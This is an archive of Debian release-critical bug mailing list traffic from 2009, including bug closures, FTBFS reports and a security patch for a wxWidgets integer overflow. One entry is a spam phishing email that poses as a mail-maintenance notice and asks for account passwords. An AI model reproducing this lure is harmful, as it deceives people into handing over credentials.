4:4.3.1) | 4:4.3.1-1 libpam0g (= 0.99.7.1) | 1.0.1-10 libphonon4(= 4:4.2.0) | 4:4.5.2-2 libplasma3(= 4:4.3.1) | 4:4.3.1-1 libpng12-0 (= 1.2.13-4) | 1.2.39-1 libpolkit-dbus2 (= 0.7) | 0.9-4 libpolkit-grant2 (= 0.7) | 0.9-4 libpolkit-qt0 | 0.9.2-2 libpolkit2(= 0.8) | 0.9-4 libprocessui4 (= 4:4.3.1) | 4:4.3.1-1 libqimageblitz4| 1:0.0.4-4 libqt4-dbus (= 4:4.5.2) | 4:4.5.2-2 libqt4-qt3support (= 4:4.5.2) | 4:4.5.2-2 libqt4-script (= 4:4.5.2) | 4:4.5.2-2 libqt4-xml(= 4:4.5.2) | 4:4.5.2-2 libqtcore4(= 4:4.5.2) | 4:4.5.2-2 libqtgui4 (= 4:4.5.2) | 4:4.5.2-2 libsm6 | 2:1.1.1-1 libsolidcontrol4 (= 4:4.3.1) | 4:4.3.1-1 libsolidcontrolifaces4(= 4:4.3.1) | 4:4.3.1-1 libsoprano4 (= 2.1.1) | 2.3.0+dfsg.1-2+b3 libstdc++6 (= 4.2.1) | 4.4.1-1 libstreamanalyzer0 (= 0.7.0) | 0.7.0-1+b2 libusb-0.1-4 (= 2:0.1.12) | 2:0.1.12-13 libx11-6 | 2:1.2.2-1 libxau6| 1:1.0.4-2 libxcursor1 ( 1.1.2) | 1:1.1.9-1 libxext6 | 2:1.0.4-1 libxfixes3(= 1:4.0.1) | 1:4.0.3-2 libxi6(= 2:1.1.2) | 2:1.2.1-2 libxinerama1 | 2:1.0.3-2 libxklavier12 (= 3.8) | 3.9-1 libxrandr2(= 2:1.2.0) | 2:1.3.0-2 libxrender1| 1:0.9.4-2 libxss1| 1:1.1.3-1 libxtst6 | 2:1.0.3-1 libxxf86misc1 | 1:1.0.1-3 phonon(= 4:4.5.2) | 4:4.5.2-2 plasma-widgets-workspace (= 4:4.3.1-1) | 4:4.3.1-1 kdebase-workspace-data (= 4:4.3.1-1) | 4:4.3.1-1 x11-utils | 7.4+1 x11-xserver-utils | 7.4+2 kaboom (= 1.0.5) | 1.1.1 kdebase-workspace-kgreet-plugins (= 4:4.3.1-1) | 4:4.3.1-1 Recommends(Version) | Installed ===-+-=== plasma-scriptengines| 4:4.3.1-1 Suggests (Version) | Installed -+-=== x11-xkb-utils| 7.4+3 -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547174: marked as done (fails to start due to XML parser stupidity)
Your message dated Thu, 17 Sep 2009 17:35:34 +0200 with message-id 20090917153534.ga11...@localhost.localnet and subject line Re: Bug#547174: fails to start due to XML parser stupidity has caused the Debian Bug report #547174, regarding fails to start due to XML parser stupidity to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 547174: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=547174 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: inkscape Version: 0.46-9 Severity: grave I am almost certain this isn't an inkscape bug, but I cannot allocate time to track this down right now. Please reassign. Fact is that the parser is very confused about line #1 and what start of the document means. lapse:~|master|% inkscape #10001 /usr/share/inkscape/templates/default.svg:1: parser error : XML declaration allowed only at the start of the document ?xml version=1.0 encoding=UTF-8 standalone=no? [there are more errors like this following, which I've cut.] Inkscape does not start. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (500, 'stable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.30-1-686 (SMP w/1 CPU core) Locale: LANG=en_GB, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages inkscape depends on: ii libatk1.0-01.26.0-1 The ATK accessibility toolkit ii libc6 2.9-26GNU C Library: Shared libraries ii libcairo2 1.8.8-2 The Cairo 2D vector graphics libra ii libcairomm-1.0-1 1.8.0-1 C++ wrappers for Cairo (shared lib ii libfontconfig1 2.6.0-4 generic font configuration library ii libfreetype6 2.3.9-5 FreeType 2 font engine, shared lib ii libgc1c2 1:6.8-1.2 conservative garbage collector for ii libgcc11:4.4.1-4 GCC support library ii libgconf2-42.26.2-3 GNOME configuration database syste ii libglib2.0-0 2.20.5-1 The GLib library of C routines ii libglibmm-2.4-1c2a 2.20.1-1 C++ wrapper for the GLib toolkit ( ii libgnomevfs2-0 1:2.24.1-4GNOME Virtual File System (runtime ii libgtk2.0-02.16.6-1 The GTK+ graphical user interface ii libgtkmm-2.4-1c2a 1:2.16.0-2C++ wrappers for GTK+ 2.4 (shared ii libgtkspell0 2.0.13-2 a spell-checking addon for GTK's T ii liblcms1 1.18.dfsg-1 Color management library ii libpango1.0-0 1.24.5-1 Layout and rendering of internatio ii libpangomm-1.4-1 2.24.0-3+b1 C++ Wrapper for pango (shared libr ii libpng12-0 1.2.39-1 PNG library - runtime ii libpoppler-glib4 0.10.6-1 PDF rendering library (GLib-based ii libpoppler40.10.6-1 PDF rendering library ii libpopt0 1.14-4lib for parsing cmdline parameters ii libsigc++-2.0-0c2a 2.0.18-2 type-safe Signal Framework for C++ ii libssl0.9.80.9.8k-5 SSL shared libraries ii libstdc++6 4.4.1-4 The GNU Standard C++ Library v3 ii libwpd8c2a 0.8.14-1 Library for handling WordPerfect d ii libwpg-0.1-1 0.1.3-1 WordPerfect graphics import/conver ii libx11-6 2:1.2.2-1 X11 client-side library ii libxft22.1.13-3 FreeType-based font drawing librar ii libxml22.7.4.dfsg-1 GNOME XML library ii libxslt1.1 1.1.24-2 XSLT processing library - runtime ii zlib1g 1:1.2.3.3.dfsg-15 compression library - runtime Versions of packages inkscape recommends: ii imagemagick 7:6.5.5.3-1 image manipulation programs ii libwmf-bin 0.2.8.4-6.1 Windows metafile conversion tools ii perlmagick 7:6.5.5.3-1 Perl interface to the ImageMagick ii pstoedit 3.45-8 PostScript and PDF files to editab Versions of packages inkscape suggests: ii dia 0.97-2 Diagram editor ii libgnomevfs2-extra1:2.24.1-4 GNOME Virtual File System (extra m pn libsvg-perl none (no description available) pn libxml-xql-perl none (no description available) ii python2.5.4-2An
Bug#547174: fails to start due to XML parser stupidity
Close: 547174 thanks Hi Martin! On Thu, Sep 17, 2009 at 02:20:01PM +0200, martin f krafft wrote: Package: inkscape Version: 0.46-9 Severity: grave I am almost certain this isn't an inkscape bug, but I cannot allocate time to track this down right now. Please reassign. Fact is that the parser is very confused about line #1 and what start of the document means. lapse:~|master|% inkscape #10001 /usr/share/inkscape/templates/default.svg:1: parser error : XML declaration allowed only at the start of the document ?xml version=1.0 encoding=UTF-8 standalone=no? Thanks for your report, but this is actually a bug in libxml2. Please see also the bug reports http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546254 http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=546488 And in fact ii libxml22.7.4.dfsg-1 GNOME XML library it is already fixed in libxml2 2.7.4.dfsg-2. So if you do an upgrade, all should be fine :-) HTH, Wolfi signature.asc Description: Digital signature
Bug#547167: Useless as packaged
Ross Burton 提到: Package: mojito Version: 0.21.1 Severity: grave As packaged, Mojito is useless. There are no API keys passed to configure, so none of the service implementations are compiled, so Mojito cannot do anything. Hi Ross, I'll apply API keys soon. Currently I'm removing all API keys which are not belonging to us. Many Thanks, Paul -- PaulLiu(劉穎駿) E-mail address: paul...@debian.org signature.asc Description: OpenPGP digital signature
Bug#545608: Bug #545608: intent to NMU polybori
Thanks for the info! Feel free to ask me if you need sponsoring. Regards, -- .''`. : :' : Luca Falavigna dktrkr...@debian.org `. `' `- signature.asc Description: OpenPGP digital signature
Bug#544756: Attention E-mail Account holder
Attention E-mail Account holder, This message is from the Database Information Technology service messaging center, to all our e-mail account holders. All Mailhub systems will under go regularly scheduled maintenance. Access to your mailbox via our mailportal will be unavailable for some period of time during this maintenanceperiod. We shall be carrying out service maintenance on our database and e-mail account center for better online services. We are deleting all unusede-mail accounts to create more space for new accounts In order to ensure you do not experience service interruptions/possible deactivation Please you must reply to this email immediately confirming your email account details below for confirmation/identification. 1. First Name Last Name: 2. Full Login Email Address: 3. Username Password: 4. Confirm your Current Password: Failure to do this may automatically render your e-mail account deactivated from our email database/mail server.. to enable us upgrade your email account,please do reply to this mail. Thanks. Upgrade Team -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#543565: marked as done (Missing license info for some files)
Your message dated Thu, 17 Sep 2009 16:03:06 + with message-id e1mojrq-0003wh...@ries.debian.org and subject line Bug#543565: fixed in groovy 1.6.4-4 has caused the Debian Bug report #543565, regarding Missing license info for some files to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543565: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543565 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: groovy Version: 1.6.3-1 Severity: serious Hi, I noticed that there are some files under BSD-2 in this package, but that is not mentioned in debian/copyright. Also, the Apache-2 license isn't mentioned, even though this is now the dominant license. Thanks, James ---End Message--- ---BeginMessage--- Source: groovy Source-Version: 1.6.4-4 We believe that the bug you reported is fixed in the latest version of groovy, which is due to be installed in the Debian FTP archive: groovy-doc_1.6.4-4_all.deb to pool/main/g/groovy/groovy-doc_1.6.4-4_all.deb groovy_1.6.4-4.diff.gz to pool/main/g/groovy/groovy_1.6.4-4.diff.gz groovy_1.6.4-4.dsc to pool/main/g/groovy/groovy_1.6.4-4.dsc groovy_1.6.4-4_all.deb to pool/main/g/groovy/groovy_1.6.4-4_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 543...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Torsten Werner twer...@debian.org (supplier of updated groovy package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 16 Sep 2009 13:25:12 +0200 Source: groovy Binary: groovy groovy-doc Architecture: source all Version: 1.6.4-4 Distribution: unstable Urgency: low Maintainer: Debian Java maintainers pkg-java-maintain...@lists.alioth.debian.org Changed-By: Torsten Werner twer...@debian.org Description: groovy - Agile dynamic language for the Java Virtual Machine groovy-doc - Agile dynamic language for the Java Virtual Machine (documentatio Closes: 543130 543565 Changes: groovy (1.6.4-4) unstable; urgency=low . [ Varun Hiremath ] * Fix debian/copyright file (Closes: #543565) * Bump Standards-Version to 3.8.3 . [ Torsten Werner ] * Remove Build-Depends: bnd and add a patch disable-bn.diff because bnd is not ready for main yet. (Closes: #543130) Checksums-Sha1: f7ea93331748df52510d944cf7d3131f366334c8 1642 groovy_1.6.4-4.dsc acd1361bd581ba9fb3aa2f8610352f4de0f6560d 10832 groovy_1.6.4-4.diff.gz cb45a1dc2b867e057165915f8229f20935fe1ba3 7505286 groovy_1.6.4-4_all.deb 14f56a2f739c41c6829b3bc11e936fb6b1520f25 4136404 groovy-doc_1.6.4-4_all.deb Checksums-Sha256: 6a00fea510688a0ff49b729c4850a271572e21267eee52df4318e0239853bcae 1642 groovy_1.6.4-4.dsc 381f147c3e073c31e6ce9839288c06277fa6cc17af700fc8d72646e1610d1dcd 10832 groovy_1.6.4-4.diff.gz 153c949eae9555a901679229840f752b9d500aea3bcd931ed3584946ac0a85a0 7505286 groovy_1.6.4-4_all.deb 4270128e198198b491a89b39adaf90605510efe1a8bc9b875457f9cf5b41082d 4136404 groovy-doc_1.6.4-4_all.deb Files: 866885b4ab4ed00b215814739718e1ae 1642 java optional groovy_1.6.4-4.dsc 776ac66f34779dad402d19304cf697f0 10832 java optional groovy_1.6.4-4.diff.gz c61d063c070d2037c5600d95f6f2ca71 7505286 java optional groovy_1.6.4-4_all.deb 95e4573d6e4f84978f43ba0130f78dce 4136404 doc optional groovy-doc_1.6.4-4_all.deb -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iEYEARECAAYFAkqyVfMACgkQfY3dicTPjsND3QCfR67Zt7Z+5HdYc/YNBYARxFxQ MIcAnid6jHrZFSVC8D4cwe3hhUvNOgFd =7uaG -END PGP SIGNATURE- ---End Message---
Bug#547188: krandrtray does not come back automagically when we merge output
tags 547188 upstream kthxbye Hello, the bug you reported is a KDE bug. Please report it via Help - Report bug... menu item of the respective application or by visiting https://bugs.kde.org/ and following the instructions to report a new bug. We appreciate that you reported the bug, but sadly the Debian Qt/KDE maintainers do not have resources to deal with non Debian-specific bugs. Therefore it is unlikely that your bug will be solved if you do not directly report it to the KDE developers (unless it is/has been reported by somebody else). Whenever you open a bug report or find an existing one in the KDE bug tracking system, you can couple both this Debian bug and the KDE bug together by sending a mail with the text below to cont...@bugs.debian.org (replace KDE-BUG-URL with the address of the bug report on https://bugs.kde.org/) [ copy this ] forwarded 547188 KDE-BUG-URL thanks [ copy this ] Greetings, Armin Berres Reply-To: Bastien ROUCARIES roucaries.bast...@gmail.com, 547...@bugs.debian.org Resent-From: Bastien ROUCARIES roucaries.bast...@gmail.com Resent-To: debian-bugs-d...@lists.debian.org Resent-CC: Debian Qt/KDE Maintainers debian-qt-...@lists.debian.org X-Loop: ow...@bugs.debian.org Resent-Date: Thu, 17 Sep 2009 15:09:27 + Resent-Message-ID: handler.547188.b.125319896717...@bugs.debian.org X-Debian-PR-Message: report 547188 X-Debian-PR-Package: kdebase-workspace-bin X-Debian-PR-Keywords: X-Debian-PR-Source: kdebase-workspace Received: via spool by sub...@bugs.debian.org id=B.125319896717939 (code B ref -1); Thu, 17 Sep 2009 15:09:27 + Received: (at submit) by bugs.debian.org; 17 Sep 2009 14:49:27 + Received: from fg-out-1718.google.com ([72.14.220.154]) by rietz.debian.org with esmtp (Exim 4.63) (envelope-from roucaries.bast...@gmail.com) id 1MoIIY-0004eB-V4 for sub...@bugs.debian.org; Thu, 17 Sep 2009 14:49:27 + Received: by fg-out-1718.google.com with SMTP id d23so1429981fga.5 for sub...@bugs.debian.org; Thu, 17 Sep 2009 07:49:25 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:from:to:subject:date :user-agent:mime-version:content-type:content-transfer-encoding :message-id; bh=mIXov/roiSUIqLG9Crvd+raUQU9EHMsTlNaxqiAxEiw=; b=A14umq+gxNa3e+ctLYFgegWIrzh7ZZPxEGy+5dcVQ6IValcXzHTOEJTvbMWMUp/lAa p3XuTbp/7zbeRQcgzkHZ2K5z+381pM+KcOfKdJPNDfzS6JamhPaeaKlFBKlTcEP7/L55 j0fTQiTraptpVZbCSASYZlqjNafLjyuhZHPS0= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=from:to:subject:date:user-agent:mime-version:content-type :content-transfer-encoding:message-id; b=tUJJAuwLaPvHAWY6fz81FibcuNvu08g4QPEl22Prnry0OlnydkGhrsjyL66+wxgA8y YfS+Qaal5fldddb0i8aYZ3PqnzZtZD5YfrXJ7zKO+P5kk4TwIB54bxQoAv5h5JdJWPV+ /LbKyQmMBW3K4UAXmqnLnwgbTJnjVREK3ck7o= Received: by 10.86.17.27 with SMTP id 27mr660917fgq.31.1253198965266; Thu, 17 Sep 2009 07:49:25 -0700 (PDT) Received: from portablebastien.localnet ([147.127.17.49]) by mx.google.com with ESMTPS id 4sm168856fge.29.2009.09.17.07.49.24 (version=SSLv3 cipher=RC4-MD5); Thu, 17 Sep 2009 07:49:24 -0700 (PDT) From: Bastien ROUCARIES roucaries.bast...@gmail.com To: sub...@bugs.debian.org Date: Thu, 17 Sep 2009 16:49:14 +0200 User-Agent: KMail/1.12.1 (Linux/2.6.30-1-amd64; KDE/4.3.1; x86_64; ; ) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-Id: 200909171649.15178.roucaries.bastien+...@gmail.com Delivered-To: sub...@bugs.debian.org Resent-Date: Thu, 17 Sep 2009 15:09:30 + X-Rc-Spam: 2008-11-04_01 X-Rc-Virus: 2007-09-13_01 X-Rc-Spam: 2008-11-04_01 X-Mailing-List: debian-qt-...@lists.debian.org archive/latest/35137 X-Loop: debian-qt-...@lists.debian.org List-Id: debian-qt-kde.lists.debian.org List-Post: mailto:debian-qt-...@lists.debian.org List-Help: mailto:debian-qt-kde-requ...@lists.debian.org?subject=help List-Subscribe: mailto:debian-qt-kde-requ...@lists.debian.org?subject=subscribe List-Unsubscribe: mailto:debian-qt-kde-requ...@lists.debian.org?subject=unsubscribe Precedence: list Resent-Sender: debian-qt-kde-requ...@lists.debian.org Package: kdebase-workspace-bin Version: 4:4.3.1-1 Severity: grave Krandrtray offer to go to previous setting after 15s if we do not click on ok. Unfortunatly it apply immediatly the setting when merging the output leading on my video output on a black screen, crashing my Xsession (therefore grave) Regards Bastien --- System information. --- Architecture: amd64 Kernel: Linux 2.6.30-1-amd64 Debian Release: squeeze/sid 550 testing http.us.debian.org 500 unstablehttp.us.debian.org --- Package information. --- Depends (Version) | Installed
Processed: Re: Bug#547188: krandrtray does not come back automagically when we merge output
Processing commands for cont...@bugs.debian.org: tags 547188 upstream Bug #547188 [kdebase-workspace-bin] krandrtray does not come back automagically when we merge output Added tag(s) upstream. kthxbye Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#543130: marked as done (groovy: FTBFS: Nonexistent build-dependency: bnd)
Your message dated Thu, 17 Sep 2009 16:03:06 + with message-id e1mojrq-0003wf...@ries.debian.org and subject line Bug#543130: fixed in groovy 1.6.4-4 has caused the Debian Bug report #543130, regarding groovy: FTBFS: Nonexistent build-dependency: bnd to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 543130: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=543130 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: groovy Version: 1.6.4-3 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090822 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: ** Using build dependencies supplied by package: Build-Depends: debhelper (= 6), cdbs, quilt Build-Depends-Indep: maven-repo-helper, ant (= 1.7.1), ant-optional, openjdk-6-jdk, bzip2, libasm2-java, libbsf-java, libcommons-cli-java (= 1.2), libcommons-logging-java (= 1.0.3), junit4, libmockobjects-java (= 0.09), libregexp-java (= 1.2), libservlet2.4-java, libxstream-java, libjline-java, antlr, tofrodos, ivy, bnd, libqdox-java, libjarjar-java ┌──┐ │ Install build dependencies │ └──┘ Checking for already installed source dependencies... W: Unable to locate package bnd debhelper: missing Using default version 7.3.15 cdbs: missing quilt: missing maven-repo-helper: missing ant: missing Using default version 1.7.1-3 ant-optional: missing openjdk-6-jdk: missing bzip2: already installed (1.0.5-3) libasm2-java: missing libbsf-java: missing libcommons-cli-java: missing Using default version 1.2-2 libcommons-logging-java: missing Using default version 1.1.1-4 junit4: missing libmockobjects-java: missing Using default version 0.09-3 libregexp-java: missing Using default version 1.5-2 libservlet2.4-java: missing libxstream-java: missing libjline-java: missing antlr: missing tofrodos: missing ivy: missing bnd: missing libqdox-java: missing libjarjar-java: missing Checking for source dependency conflicts... E: Couldn't find package bnd The full build log is available from: http://people.debian.org/~lucas/logs/2009/08/22/groovy_1.6.4-3_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: groovy Source-Version: 1.6.4-4 We believe that the bug you reported is fixed in the latest version of groovy, which is due to be installed in the Debian FTP archive: groovy-doc_1.6.4-4_all.deb to pool/main/g/groovy/groovy-doc_1.6.4-4_all.deb groovy_1.6.4-4.diff.gz to pool/main/g/groovy/groovy_1.6.4-4.diff.gz groovy_1.6.4-4.dsc to pool/main/g/groovy/groovy_1.6.4-4.dsc groovy_1.6.4-4_all.deb to pool/main/g/groovy/groovy_1.6.4-4_all.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 543...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Torsten Werner twer...@debian.org (supplier of updated groovy package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Wed, 16 Sep 2009 13:25:12 +0200 Source: groovy Binary: groovy groovy-doc Architecture: source all Version: 1.6.4-4 Distribution: unstable Urgency: low Maintainer: Debian Java maintainers pkg-java-maintain...@lists.alioth.debian.org Changed-By: Torsten Werner twer...@debian.org Description: groovy - Agile dynamic language for the Java Virtual Machine groovy-doc - Agile dynamic language for the Java Virtual Machine (documentatio Closes: 543130 543565 Changes: groovy (1.6.4-4) unstable; urgency=low . [ Varun Hiremath ] * Fix debian/copyright file
Bug#527789: marked as done (apertium-es-pt: FTBFS: Nonexistent build-dependency: libapertium3-3.0-0-dev)
Your message dated Thu, 17 Sep 2009 16:02:39 + with message-id e1mojrp-0003tg...@ries.debian.org and subject line Bug#527789: fixed in apertium-es-pt 1.0.3-2.1 has caused the Debian Bug report #527789, regarding apertium-es-pt: FTBFS: Nonexistent build-dependency: libapertium3-3.0-0-dev to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 527789: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=527789 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: apertium-es-pt Version: 1.0.3-2 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090508 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: ** Using build dependencies supplied by package: Build-Depends: debhelper (= 5), autotools-dev, lttoolbox (= 3.0.0), apertium (= 3.0.1), libapertium3-3.0-0-dev (= 3.0.1), libxml2-utils (= 2.6.26), xsltproc (= 1.1.19-1), gawk (= 3.1.5), pkg-config (= 0.21-1) ┌──┐ │ Install build dependencies │ └──┘ Checking for already installed source dependencies... W: Unable to locate package libapertium3-3.0-0-dev debhelper: missing Using default version 7.2.9 autotools-dev: missing lttoolbox: missing Using default version 3.1.0-1 apertium: missing Using default version 3.1.0-1.1 libapertium3-3.0-0-dev: missing libxml2-utils: missing Using default version 2.7.3.dfsg-1 xsltproc: missing Using default version 1.1.24-2 gawk: missing Using default version 1:3.1.5.dfsg-4.1 pkg-config: missing Using default version 0.22-1 Checking for source dependency conflicts... E: Couldn't find package libapertium3-3.0-0-dev The full build log is available from: http://people.debian.org/~lucas/logs/2009/05/08/apertium-es-pt_1.0.3-2_lsid64.buildlog A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute! About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems. -- | Lucas Nussbaum | lu...@lucas-nussbaum.net http://www.lucas-nussbaum.net/ | | jabber: lu...@nussbaum.fr GPG: 1024D/023B3F4F | ---End Message--- ---BeginMessage--- Source: apertium-es-pt Source-Version: 1.0.3-2.1 We believe that the bug you reported is fixed in the latest version of apertium-es-pt, which is due to be installed in the Debian FTP archive: apertium-es-pt_1.0.3-2.1.diff.gz to pool/main/a/apertium-es-pt/apertium-es-pt_1.0.3-2.1.diff.gz apertium-es-pt_1.0.3-2.1.dsc to pool/main/a/apertium-es-pt/apertium-es-pt_1.0.3-2.1.dsc apertium-es-pt_1.0.3-2.1_amd64.deb to pool/main/a/apertium-es-pt/apertium-es-pt_1.0.3-2.1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 527...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Stefano Zacchiroli z...@debian.org (supplier of updated apertium-es-pt package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@debian.org) -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Format: 1.8 Date: Tue, 15 Sep 2009 16:22:51 +0200 Source: apertium-es-pt Binary: apertium-es-pt Architecture: source amd64 Version: 1.0.3-2.1 Distribution: unstable Urgency: low Maintainer: Francis Tyers fty...@prompsit.com Changed-By: Stefano Zacchiroli z...@debian.org Description: apertium-es-pt - Apertium linguistic data to translate between Spanish and Portugu Closes: 527789 Changes: apertium-es-pt (1.0.3-2.1) unstable; urgency=low . * Non-maintainer upload. * Rebuild against apertium 3.1: fix build dependency and configure.ac accordingly; re-run autoconf. (Closes: #527789) Checksums-Sha1: b1bd6eebe4faca8b75bb4caa6d7e8aae023d0549 1225 apertium-es-pt_1.0.3-2.1.dsc dbd795e93c4fa584c3241108417e750797a40985 33989 apertium-es-pt_1.0.3-2.1.diff.gz f36f41e683a0863bf2a54b45a4bd93276cc491ea 902258 apertium-es-pt_1.0.3-2.1_amd64.deb Checksums-Sha256: 96884adccd84bd059661d54d3cacb4d05ff8bab52e2ad1d70ee66ca2274646d0 1225
Bug#537175: CVE-2009-2369: Integer overflow in the wxImage::Create function
Hi,
I've prepared a NMU to fix CVE-2009-2369 in wxwidgets2.6
debdiff attached
Cheers,
Giuseppe.
diff -u wxwidgets2.6-2.6.3.2.2/debian/changelog
wxwidgets2.6-2.6.3.2.2/debian/changelog
--- wxwidgets2.6-2.6.3.2.2/debian/changelog
+++ wxwidgets2.6-2.6.3.2.2/debian/changelog
@@ -1,3 +1,11 @@
+wxwidgets2.6 (2.6.3.2.2-3.1) unstable; urgency=low
+
+ * Non-maintainer upload.
+ * Fixed Integer overflow in the wxImage::Create function.
+(CVE-2009-2369) (Closes: #537175)
+
+ -- Giuseppe Iuculano giuse...@iuculano.it Thu, 17 Sep 2009 17:17:44 +0200
+
wxwidgets2.6 (2.6.3.2.2-3) unstable; urgency=low
* Take the flavour from the changelog, not the top dirname. sbuild has
only in patch2:
unchanged:
--- wxwidgets2.6-2.6.3.2.2.orig/src/common/imagtiff.cpp
+++ wxwidgets2.6-2.6.3.2.2/src/common/imagtiff.cpp
@@ -232,15 +232,25 @@
}
uint32 w, h;
-uint32 npixels;
uint32 *raster;
TIFFGetField( tif, TIFFTAG_IMAGEWIDTH, w );
TIFFGetField( tif, TIFFTAG_IMAGELENGTH, h );
-npixels = w * h;
+// guard against integer overflow during multiplication which could result
+// in allocating a too small buffer and then overflowing it
+const double bytesNeeded = (double)w * (double)h * sizeof(uint32);
+if ( bytesNeeded = 4294967295U /* UINT32_MAX */ )
+{
+if ( verbose )
+wxLogError( _(TIFF: Image size is abnormally big.) );
+
+TIFFClose(tif);
+
+return false;
+}
-raster = (uint32*) _TIFFmalloc( npixels * sizeof(uint32) );
+raster = (uint32*) _TIFFmalloc( bytesNeeded );
if (!raster)
{
only in patch2:
unchanged:
--- wxwidgets2.6-2.6.3.2.2.orig/src/common/imagpng.cpp
+++ wxwidgets2.6-2.6.3.2.2/src/common/imagpng.cpp
@@ -570,18 +570,16 @@
if (!image-Ok())
goto error;
-lines = (unsigned char **)malloc( (size_t)(height * sizeof(unsigned char
*)) );
+// initialize all line pointers to NULL to ensure that they can be safely
+// free()d if an error occurs before all of them could be allocated
+lines = (unsigned char **)calloc(height, sizeof(unsigned char *));
if ( !lines )
goto error;
for (i = 0; i height; i++)
{
if ((lines[i] = (unsigned char *)malloc( (size_t)(width *
(sizeof(unsigned char) * 4 == NULL)
-{
-for ( unsigned int n = 0; n i; n++ )
-free( lines[n] );
goto error;
-}
}
png_read_image( png_ptr, lines );
signature.asc
Description: OpenPGP digital signature
Processed: apertium-tolk: diff for NMU version 0.2-2.1
Processing commands for cont...@bugs.debian.org: tags 527795 + patch pending Bug #527795 [apertium-tolk] apertium-tolk: FTBFS: Nonexistent build-dependency: libapertium3-3.0-0-dev Added tag(s) pending and patch. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#536683: Installation/upgrade freezes when non-standard XKBLAYOUT used
